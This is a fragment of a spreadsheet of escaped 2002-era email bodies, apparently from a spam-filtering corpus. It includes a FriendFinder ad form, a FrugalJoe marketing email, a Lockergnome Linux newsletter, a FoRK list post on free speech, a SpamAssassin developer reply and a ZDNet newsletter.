 &lt;option value="Rwanda" &gt; Rwanda
 &lt;option value="San Marino" &gt; San Marino
 &lt;option value="Saudi Arabia" &gt; Saudi Arabia
 &lt;option value="Senegal" &gt; Senegal
 &lt;option value="Sierra Leone" &gt; Sierra Leone
 &lt;option value="Singapore" &gt; Singapore
 &lt;option value="Slovakia" &gt; Slovakia
 &lt;option value="Slovenia" &gt; Slovenia
 &lt;option value="Somalia" &gt; Somalia
 &lt;option value="South Africa" &gt; South Africa
 &lt;option value="South Korea" &gt; South Korea
 &lt;option value="Spain" &gt; Spain
 &lt;option value="Sri Lanka" &gt; Sri Lanka
 &lt;option value="Sudan" &gt; Sudan
 &lt;option value="Sweden" &gt; Sweden
 &lt;option value="Switzerland" &gt; Switzerland
 &lt;option value="Syria" &gt; Syria
 &lt;option value="Taiwan" &gt; Taiwan
 &lt;option value="Tanzania" &gt; Tanzania
 &lt;option value="Thailand" &gt; Thailand
 &lt;option value="Togo" &gt; Togo
 &lt;option value="Trinidad" &gt; Trinidad
 &lt;option value="Tunisia" &gt; Tunisia
 &lt;option value="Turkey" &gt; Turkey
 &lt;option value="Turkmenistan" &gt; Turkmenistan
 &lt;option value="Uganda" &gt; Uganda
 &lt;option value="Ukraine" &gt; Ukraine
 &lt;option value="United Arab Emirates" &gt; U.A.E.
 &lt;option value="United Kingdom" &gt; United Kingdom
 &lt;option value="United States" &gt; United States
 &lt;option value="Uruguay" &gt; Uruguay
 &lt;option value="Venezuela" &gt; Venezuela
 &lt;option value="Vietnam" &gt; Vietnam
 &lt;option value="Yemen" &gt; Yemen
 &lt;option value="Yugoslavia" &gt; Yugoslavia
 &lt;option value="Zambia" &gt; Zambia
 &lt;option value="Zimbabwe" &gt; Zimbabwe
 &lt;/select&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="4"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="23" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;td colspan="2"&gt;&lt;input type="Image" name="Submit" src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-search.gif"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/form&gt;
 &lt;/table&gt;
 &lt;!-- end of search table --&gt;
 &lt;/td&gt;
 &lt;td&gt;&lt;a href="http://friendfinder.com/go/f36929"&gt;&lt;img src="http://e89.friendfinder.com/banners/ff/ad-images/ff-search_001-join.gif" alt="" width="347" height="421" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td colspan="2"&gt;&lt;img src="http://e89.friendfinder.com/banners/aff/ad-images/_0.gif" alt="" width="1" height="50" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=392232\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=392232\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@example.com&amp;oid=Alex-09242002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/07.10.2002.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/07.10.2002.html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&lt;/style&gt;&lt;title&gt;07.10.2002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07.10.2002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I've just got a few quick thoughts today.&lt;p&gt;
 First, the search is underway for the hosting solution mentioned in Monday's Penguin Shell. The response has been great, with more than two dozen offers of web space for the Foundation for Children and Youth With Diabetes. It gratifying to see our community rally around a great cause. Know that whether you answered the call or not, you're in the electronic company of some caring and compassionate folks. I've not yet heard whether a solution has been found from among the many offered, but I'll certainly keep you posted on the outcome.&lt;p&gt;
 Second, a few final clarifications on the 4th of July bruhaha. A reader brought to my attention that, though he didn't believe it to be the case, offering my opinion on the state of America could be seen as trolling. That certainly wasn't intended. Also, I've seen much email over the past week that started with, "Since you published the opinion of someone outside the US, I'd expect that you'll publish an opinion in disagreement." Well, I did that already - it was my own opinion that started the discussion. I can clearly see the potential for this to get out of hand. So, this will be the last word on the subject. Thanks for your opinions and your discussion, the vast majority of which was well-thought and reasonable. Both sides were presented and we're moving on.&lt;p&gt;
 On to some Lockergnome news. If you haven't already heard, 
 &lt;a href="http://www.clevermedia.com/" target="_blank"&gt;CleverMedia&lt;/a&gt; is sponsoring karaoke night at &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;Gnomedex&lt;/a&gt;. According to the woman with her finger on the pulse of Gnomedex, Lori Lockwood, "There is definitely a 'surprise' in the works for the attendees ... " Hmmm. Could it even compare to last year's Miss Gnomedex contest? I think it unlikely. In any regard, the folks at CleverMedia are certainly more than capable of coming up with loads of fun -- it's what they do for a living! Between &lt;a href="http://www.leoville.com/" target="_blank"&gt;Leo Laporte&lt;/a&gt;, &lt;a href="http://doc.weblogs.com/" target="_blank"&gt;Doc Searls&lt;/a&gt;, &lt;a href="http://www.grc.com/" target="_blank"&gt;Steve Gibson&lt;/a&gt;, &lt;a href="http://www.analogx.com/" target="_blank"&gt;Mark Thompson&lt;/a&gt;, &lt;a href="http://www.evhead.com/" target="_blank"&gt;Evan Williams&lt;/a&gt;, and too many others to mention, you'd be silly to miss out.&lt;p&gt;
 Onward. Have a great day.&lt;p&gt;&lt;p&gt;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&lt;b&gt;Windows Apps in Linux? - Part II&lt;/b&gt;&lt;p&gt;
 I don't want to mince any words, here. &lt;a href="http://www.codeweavers.com/ target="_blank"&gt;CodeWeavers&lt;/a&gt; has really hit a sweet spot with their recently-released &lt;a href="http://codeweavers.com/products/office/" target="_blank"&gt;CrossOver Office&lt;/a&gt; product. This is, quite simply, the fulfillment of the promise of the &lt;a href="http://wine.codeweavers.com/" target="_blank"&gt;Wine Project&lt;/a&gt;. Using this slick little app, virtually all the applications in the Microsoft Office suite are fully functional in Linux. Frankly, I never thought I'd see the day when running Windows apps in Linux was exciting. Maybe it's time to take up shucking ice cubes in the blasted lands.&lt;p&gt;
 Let's break this product up a bit. If purchased as a bundle, both CrossOver Office and &lt;a href="http://codeweavers.com/products/crossover/" target="_blank"&gt;CrossOver Plugin&lt;/a&gt; (as we discussed yesterday) share an install script. They do, however, require separate install processes, so they need to be launched individually from a shared window.&lt;p&gt;
 I started the CrossOver Office install, dropped my Office 2000 disc in the CD drive, and fired up the install. It looked and performed exactly as you'd expect to see it in Windows. I was able to customize the install, as I always have, then let it run. At the end of the process, CrossOver Office "fakes" a Windows reboot and the Office suite installation is complete.&lt;p&gt;
 Even Internet Explorer 5.0 is installed. There's an option in the CrossOver Office package to install IE 5.5 but, to my chagrin, this was the one area of the install that failed. Actually, the install itself may have succeeded - I was just left without an IE browser following the upgrade. It's hard to tell whether that was a fault in CrossOver Office, or in the IE program itself.&lt;p&gt;
 For the most part, these apps perform in Linux as they do in Windows. The IE install was a bit kludgy, with some font problems and an inability to customize the toolbar. Word worked perfectly, allowing me even to pull together legal documents for a friend's business without so much as a hiccup. Even printing works well with the installation of a "Wine Postscript Printer" driver.&lt;p&gt;
 Let me reiterate something I said yesterday. I've watched the Wine Project walk, then crawl, then walk again over the past few years. I've always suspected that the fits and starts were not for lack of talent. With the financial backing of CodeWeavers, it appears that my suspicions were well founded. Wine has, through CrossOver Office and CrossOver Plugin, matured to a level of useability that should easily attract Linux users throughout the spectrum of experience. In the big picture, widespread acceptance of these products could remove the last remaining roadblock for many current Windows users to make the leap to Linux: the loss of Word and Excel. They simply don't need to fear those losses any more.&lt;p&gt;
 A note on the "for pay" structure of these products seems in order. As you well know, I'm an open source guy through and through. But, this is clearly a case in which the "free" efforts of talented and dedicated developers simply wasn't enough to close the gap. The value of these products easily outweighs their minimal cost. And, if it keeps these developers moving forward, it seems to be the perfect pay model for Linux.&lt;p&gt;&lt;p&gt;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X&lt;/b&gt;&lt;p&gt;
 Today we're looking into the mysteries of Plug and Play support in your Linux kernel configuration.&lt;p&gt;
 There's really not much mystery to it. This section simply asks the question, "Do you want plug and play support in the kernel?" In other words, do you have all the PCI and ISA devices in your system that you'll ever need to have? If you're set solid with your current machine, there's no use to add the overhead of PnP to your system's kernel code, or as a loadable module. If, on the other hand, you've got PCI or (on an older system) ISA slots just begging to be filled, build this support into the kernel or select it as modules.&lt;p&gt;
 See, this kernel gig isn't really so tough. In fairness, we're hitting the high points without a heady discussion of the hidden workings. The discussion of PnP alone could comprise a full series in Penguin Shell. But, so far, the configuration has been pretty straightforward.&lt;p&gt;
 Tomorrow, we &lt;i&gt;will&lt;/i&gt; dive a bit deeper, with a discussion of block device kernel configuration.&lt;p&gt;&lt;p&gt;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&lt;b&gt;LiquidWar&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href=""&gt;&lt;/a&gt;&lt;br&gt;
 &lt;a class="url" href="http://www.ufoot.org/liquidwar/"&gt;http://www.ufoot.org/liquidwar/&lt;/a&gt;&lt;p&gt;
 "Liquid War is a truly original multiplayer wargame. You control an army formed with thousands of pixels (fighters) which look like liquid and try to eat your opponent. You can play against a primitive NPC/AI or up to 5 other human players. Network play is available."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Gnome 2 Installation Notes&lt;/b&gt;&lt;br&gt;
 &lt;span class="url"&gt;Scribbled by Dale Hirt&lt;/span&gt;&lt;p&gt;
 "As always, am loving the newsletter.  I've been getting it since day one,
 and I love all the stuff that you have put in it.&lt;p&gt;
 "Just a quick word about the Gnome2 installation.  At least so far in my
 installation wonders, I have noticed that you need to install intltool (#15)
 before scrollkeeper (#3), as it is required in order to build.&lt;p&gt;
 Thanks again for a great newsletter."&lt;p&gt;&lt;p&gt;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&lt;b&gt;Linmodems.org&lt;/b&gt;&lt;p&gt;
 &lt;a class="url" href="http://www.linmodems.org/"&gt;http://www.linmodems.org/&lt;/a&gt;&lt;p&gt;
 Linmodems.org is a full-featured site on modem hardware and setup in Linux. This has always been a point of friction with Linux users - finding that the machine you've just coverted doesn't have a Linux-compatible modem, or finding modem configuration to be too difficult. Linmodems.org takes on both these issues with skill and ease. The site includes discussion on hardware, software and chipsets. It also links to sites to walk you through the process of setting up a winmodem in Linux. This is a great resource of your main connection to the e-universe is via a dialup connection.&lt;p&gt;&lt;p&gt;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href="http://www.lockergnome.com/issues/penguinshell/07.10.2002.html"&gt;http://www.lockergnome.com/issues/penguinshell/07.10.2002.html&lt;/a&gt;
 &lt;p&gt;Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org]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</si>
  <si>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
 In a message dated 9/19/2002 7:46:37 AM, chuck@topsail.org writes:
 &gt;That means *you* can't say anything may not be FoRKed or printed or 
 &gt;whatever. You have the choice to ignore it
 That's not what the First Amendment says at all. It says that Congress cannot 
 say what can't be FoRKed. FoRK can establish any rules it wants. Similarly, 
 The New York Times gets to choose what news IT thinks is "fit to print." If 
 the Times chose not to print anything about, say, Rosie O'Donnell, it would 
 be exercising its First Amendment rights, just as much as it would be if it 
 chose to print something Rosie O'Donnell doesn't like. The necessary 
 corollary of the freedom to say/publish what one wants is the freedom to 
 refuse to publish or say what one doesn't like. The alternative is a 
 state-controlled press that reprints government press releases and calls them 
 news.
 The question of what is or is not FoRKed is (except for libel or other 
 specific exceptions) not a matter of law, but a matter of what the 
 "publisher" (if any) decides or the "community" (if any) negotiates or does 
 as a matter of custom.
 For my part, I'd rather people didn't use FoRK as a place in which to dump an 
 expression of their political beliefs.
 Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] [Bug 584] New: More general rule cleanup
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Dan. And the changes were very clever. Some of his rule changes 
 actually did make thing more readable and he is highly skilled at 
 regular expressions.  I have found that readability and 
 understandability is important in maintaining code. I think in a group 
 project that it's more important.
 Daniel Quinlan wrote:
 &gt;This is not a big deal, but I think Marc has a good point.  The
 &gt;performance difference is probably insignificant.  On the other hand, we
 &gt;continually have errors in regular expressions, often when "excessive
 &gt;cleverness" has been applied.
 &gt;
 &gt;This seems like a pretty good example of premature/excessive
 &gt;optimization.  There is no data showing that the relevant code is run
 &gt;for any significant period of time or that these changes produce a
 &gt;measurable improvement in performance.  Maybe they do, but it would be
 &gt;nice to know before we complicate every regular expression.
 &gt;
 &gt;In contrast, your changes to the eval loops in PerMsgStatus.pm were
 &gt;great.  The code was responsible for a lot of our execution time and
 &gt;there was a huge speed improvement.  Even better, the code was just as
 &gt;easy to understand as the original.
 &gt;
 &gt;Dan
 &gt;
 &gt;  
 &gt;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</si>
  <si>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=3D30-u8NEIRrPLwvPIzv8IeOdSKzjX1iR" &gt;&lt;img src=3D"http://www.zdnet.com/graph=
 ics/newsletters/hd_anchor.gif" width=3D"440" height=3D"60" border=3D"0"  al=
 t=3D"AnchorDesk Daily"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D160 align=3Dcenter valign=3Dtop rowspan=3D2 bgcolor=3D"#ffffff"=
 &gt;
         &lt;br&gt;
         &lt;!--tower --&gt;
       &lt;div align=3D"center"&gt;&lt;img src=3D"http://i.i.com.com/cnwk.1d/Ads/comm=
 on/advertisement.gif" width=3D"120" height=3D"10" border=3D"0"&gt;&lt;/br&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D45-fNkJIKBij6jwUVz-EDvznhj=
 onlZR" target=3D"new"&gt;  =20
 &lt;img src=3D"http://www.techrepublic.com/images/ads/ban_160x600_domainsgirl3=
 .gif" width=3D"160" height=3D"600" border=3D"0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href=3D"http://clickthru.online.com/Click?q=3D5b-5LOwIBK=
 kZhFFYL3xCjjvDSwizzcR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D70-3vnJIdp=
 iybdmO2pKns2asfI8UkRR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1=
 " height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D85-2G2oQ7K=
 reJoYyitaf70SVbToBBPR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Find out the top 10 Web services security requirements at Tech Update.&lt;/b&gt;&lt;=
 /font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=
 =3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3D9a-b6_GQTM=
 pSkXyw6pFigi7yr9FKgnR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;=
 /b&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" wid=
 th=3D"1" height=3D"6"&gt;&lt;br&gt;
        =20
                =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Daf--dB8QLp=
 7D-RouLpydDX7NdmUVSeR" &gt;&lt;FONT FACE=3D"Arial, Geneva, Lucida" SIZE=3D"2"&gt;&lt;b&gt;=
 Check out thousands of IT job listings in ZDNet's Career Center.&lt;/b&gt;&lt;/font&gt;=
 &lt;/a&gt;&lt;br&gt; &lt;img src=3D"http://www.zdnet.com/graphics/clear.gif" width=3D"1" h=
 eight=3D"6"&gt;&lt;br&gt;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&gt;FRI JUL 19,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ck?q=3Dc4-Iy9lQ0WstJFP-onkHF6q-jPexAyR" &gt;&lt;b&gt;MS/Apple: Can this marriage be =
 saved? (I doubt it)&lt;/A&gt;&lt;/B&gt;&lt;/font&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/clear.gif" width=3D"1" height=3D"4"&gt;&lt;br&gt;
                 Apple is cutting hardware prices, raising software prices, =
 building features into OS X that compete with MS Office, and placing ads ur=
 ging Windows users to switch. Are these the first signs of an Apple/MS divo=
 rce? Here's what I think.&lt;p&gt;
         =20
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Dda-dT8jQUP=
 7l4HS9R3bjsMVKpv3DxnR" &gt;&lt;b&gt;NOTE: Why we're changing our publishing schedule=
 &lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage=
 /b.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
        =20
                 &lt;a href=3D"http://clickthru.online.com/Click?q=3Def-04uYQmk=
 x5ZwF13HqBxDVAmoBameR" &gt;&lt;b&gt;PLUS: AnchorDesk Radio: The latest chips from Nv=
 idia and ATI&lt;/b&gt; &lt;/a&gt;&lt;br&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchorde=
 sk/frontpage/b.gif"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href=3D"http://clickthru.online.com/Click?q=3D04-k9W0IFQcTfUWU98=
 98BbBL7kOi_yR" &gt;Tighter PC security... Encrypt your laptop... Pittman leavi=
 ng AOL &lt;/a&gt;&lt;p&gt;
         =20
        =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D19-BLe0I2rcgevnM89=
 KMZ2Fz8IR7XlR" &gt;Your top tips for shaping up flabby hard drives &lt;/a&gt;&lt;p&gt;
         =20
        =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D2e-eMTGIiKj5M2iWA6=
 ktQ3DlPfP8N4R" &gt;Here's what I think of Jobs's Macworld keynote&lt;/a&gt;&lt;p&gt;
                =20
                =20
         &lt;a href=3D"http://clickthru.online.com/Click?q=3D43-coL5IBJ3L8YD_Pm=
 9Z5VKc-3P0BcR" &gt;TiVo: Why it gets no gold stars for mandatory ads&lt;/a&gt;&lt;p&gt;
                =20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
 g=3D"0" border=3D"0" bgcolor=3D"#ffffff"&gt;    &lt;tr bgcolor=3D"#999999"&gt;&lt;td co=
 lspan=3D"7" height=3D"15"&gt;&lt;font face=3D"ms sans serif, geneva" color=3D"#ff=
 ffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/fron=
 tpage/b.gif" height=3D1 width=3D3&gt;&lt;b&gt;Crucial Clicks: More from ZDNet&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;    &lt;td bgcolor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D=
 "http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 width=
 =3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/a=
 nchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td colspan=3D"3"&gt;=
 &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" heigh=
 t=3D5 width=3D1&gt;&lt;/td&gt;    &lt;td rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com=
 /graphics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;    &lt;td bgc=
 olor=3D"#999999" rowspan=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/an=
 chordesk/frontpage/b.gif" height=3D1 width=3D1&gt;&lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=
 =3D"top"&gt;    &lt;td width=3D"100%"&gt;          &lt;table width=3D"100%"  cellpaddin=
 g=3D"0" cellspacing=3D"0" border=3D"0"&gt;        &lt;tr&gt;&lt;td colspan=3D"3"&gt;&lt;font =
 face=3D"verdana, geneva" color=3D"#333333" size=3D"-2"&gt;&lt;b&gt;MONITORS&lt;/b&gt;&lt;/fon=
 t&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" height=3D3 width=3D1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;            &lt;tr valign=3D"top"&gt;    =
    &lt;td width=3D"85"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53=
 oIEn9utdDwHAlpW-B_KMqztFR" &gt;&lt;img src=3D"http://www.zdnet.com/products/graph=
 ics/040802_monitors.jpg" width=3D"85" height=3D"110" border=3D"0" alt=3D"" =
 /&gt;&lt;/a&gt;&lt;/td&gt;           &lt;td width=3D"5"&gt;&lt;img src=3D"http://www.zdnet.com/grap=
 hics/anchordesk/frontpage/b.gif" height=3D1 width=3D5&gt;&lt;/td&gt;        &lt;td widt=
 h=3D"100%"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://cl=
 ickthru.online.com/Click?q=3D6e-2aYjIyEG1DPJfKnQA5K-fxuEL59R" style=3D"text=
 -decoration:none"&gt;&lt;b&gt;A Porsche you can afford&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;    Brought to y=
 ou by Samsung and F.A. Porsche, the SyncMaster 171P is a sleek, 17-inch LCD=
  with sharp image quality and snazzy design. But ZDNet reviewers say it's a=
  bit pricey.        &lt;/font&gt;&lt;/td&gt;       &lt;/tr&gt;           &lt;tr&gt;&lt;td colspan=3D"3=
 "&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" hei=
 ght=3D3 width=3D1&gt;&lt;br /&gt;&lt;img src=3D"http://techupdate.zdnet.com/techupdate/=
 i/arrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;font f=
 ace=3D"arial, helvetica" size=3D"-1"&gt;&lt;a href=3D"http://clickthru.online.com=
 /Click?q=3D83-U-BXQYJq_ZAY8v6tuoAABMMPZ9rR" style=3D"text-decoration:none"&gt;=
 Read review&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;           &lt;/table&gt;    &lt;/td&gt;    &lt;td&gt;&lt;img sr=
 c=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3D1 w=
 idth=3D5&gt;&lt;/td&gt;    &lt;td width=3D"180"&gt;         &lt;table cellpadding=3D"0" cells=
 pacing=3D"0" width=3D"180" border=3D"0" bgcolor=3D"#eeeeee"&gt;        &lt;tr bgc=
 olor=3D"#999999"&gt;&lt;td colspan=3D"3" height=3D"15"&gt;&lt;font face=3D"ms sans seri=
 f, geneva" color=3D"#ffffff" size=3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/g=
 raphics/anchordesk/frontpage/b.gif" height=3D1 width=3D3&gt;Most Popular Produ=
 cts&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;      &lt;tr&gt;            &lt;td&gt;&lt;img src=3D"http://www.zdnet.=
 com/graphics/anchordesk/frontpage/b.gif" width=3D"10" height=3D"1" alt=3D""=
  border=3D"0" /&gt;&lt;/td&gt;         &lt;td&gt;&lt;font face=3D"ms sans serif, geneva" size=
 =3D"-2"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" width=3D"1" height=3D"5" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;Mo=
 nitors&lt;/b&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontp=
 age/b.gif" width=3D"1" height=3D"7" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;        &lt;=
 b&gt;1&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/Click?q=3D98-FTaOQ_z4Y8wzqR=
 4CW5CH7esbKRiR" style=3D"text-decoration:none"&gt;Samsung SyncMaster 151S&lt;/a&gt;&lt;=
 br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 width=3D"1" height=3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;     &lt;b&gt;2&lt;/b&gt;. &lt;a hr=
 ef=3D"http://clickthru.online.com/Click?q=3Dad-_4IAQzEpaIFnNBlQhaIHsSzky0PR=
 " style=3D"text-decoration:none"&gt;NEC MultiSync 1550V&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"h=
 ttp://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=
 =3D"3" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;          &lt;b&gt;3&lt;/b&gt;. &lt;a href=3D"http://=
 clickthru.online.com/Click?q=3Dc2-oXxLQUEDqUaWo4rgVnxXFZcIuInR" style=3D"te=
 xt-decoration:none"&gt;Envision EN-5100e&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet=
 .com/graphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D""=
  border=3D"0" /&gt;&lt;br /&gt;            &lt;b&gt;4&lt;/b&gt;. &lt;a href=3D"http://clickthru.onl=
 ine.com/Click?q=3Dd7-wk3ZQLWDyUmJDgcRmBekeVktk2eR" style=3D"text-decoration=
 :none"&gt;Samsung SyncMaster 570 V&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/g=
 raphics/anchordesk/frontpage/b.gif" width=3D"1" height=3D"3" alt=3D"" borde=
 r=3D"0" /&gt;&lt;br /&gt;          &lt;b&gt;5&lt;/b&gt;. &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3Ded-jLlvQgV7qkUkUVcxv3orMjEsaQPR" style=3D"text-decoration:none"&gt;S=
 amsung SyncMaster 955 DF&lt;/a&gt;&lt;br /&gt;&lt;img src=3D"http://www.zdnet.com/graphics=
 /anchordesk/frontpage/b.gif" width=3D"1" height=3D"6" alt=3D"" border=3D"0"=
  /&gt;&lt;br /&gt;            &lt;img src=3D"http://techupdate.zdnet.com/techupdate/i/a=
 rrow_blue.gif" width=3D"8" height=3D"10" border=3D"0" alt=3D"" /&gt;&lt;b&gt;&lt;a href=
 =3D"http://clickthru.online.com/Click?q=3D02-qia9IljjNkKO_m7_XGuwrfzJ6nnR" =
 style=3D"text-decoration:none"&gt;More popular monitors&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;         =
 &lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width=
 =3D"1" height=3D"10" alt=3D"" border=3D"0" /&gt;&lt;br /&gt;            &lt;/font&gt;&lt;/td&gt;=
             &lt;td&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontp=
 age/b.gif" width=3D"10" height=3D"1" alt=3D"" border=3D"0" /&gt;&lt;/td&gt;         =
 &lt;/tr&gt;           &lt;/table&gt;    &lt;/td&gt;    &lt;/tr&gt;    &lt;tr valign=3D"top"&gt;&lt;td colspa=
 n=3D"3"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gi=
 f" height=3D5 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;tr&gt;&lt;td colspan=3D"7" bgcolor=3D"#999=
 999"&gt;&lt;img src=3D"http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" =
 height=3D1 width=3D1&gt;&lt;/td&gt;&lt;/tr&gt;    &lt;/table&gt;    &lt;!-- /### --&gt; &lt;table cellpad=
 ding=3D10 border=3D0 cellspacing=3D0&gt;
 &lt;tr&gt;&lt;td&gt;=20
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
 Click?q=3D17-agitI5XQeDrnaDrIz4s1RhjGRseR"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://clickthru.online.com/Click?q=3D2c-DatOIc0kqhK51D5c-r7MBvWpjuyR" &gt;&lt;b&gt;Tigh=
 ter PC security... Encrypt your laptop... Pittman leaving AOL&lt;/b&gt;&lt;/a&gt;&lt;br&gt;Th=
 e government supports a benchmark that protects computers from hack attacks=
  and   viruses. Plus: A start-up unveils software that lets you easily encr=
 ypt data. And AOL   Time Warner COO Bob Pittman is leaving the company. &lt;/f=
 ont&gt;&lt;/td&gt;
                 &lt;/tr&gt;&lt;/table&gt;
          &lt;!--------AD-----------------------------------&gt;
        =20
 &lt;!--------/AD-----------------------------------&gt;
 &lt;br&gt;
        =20
                 =20
                =20
                        =20
                                     &lt;a href=3D"http://clickthru.online.com/=
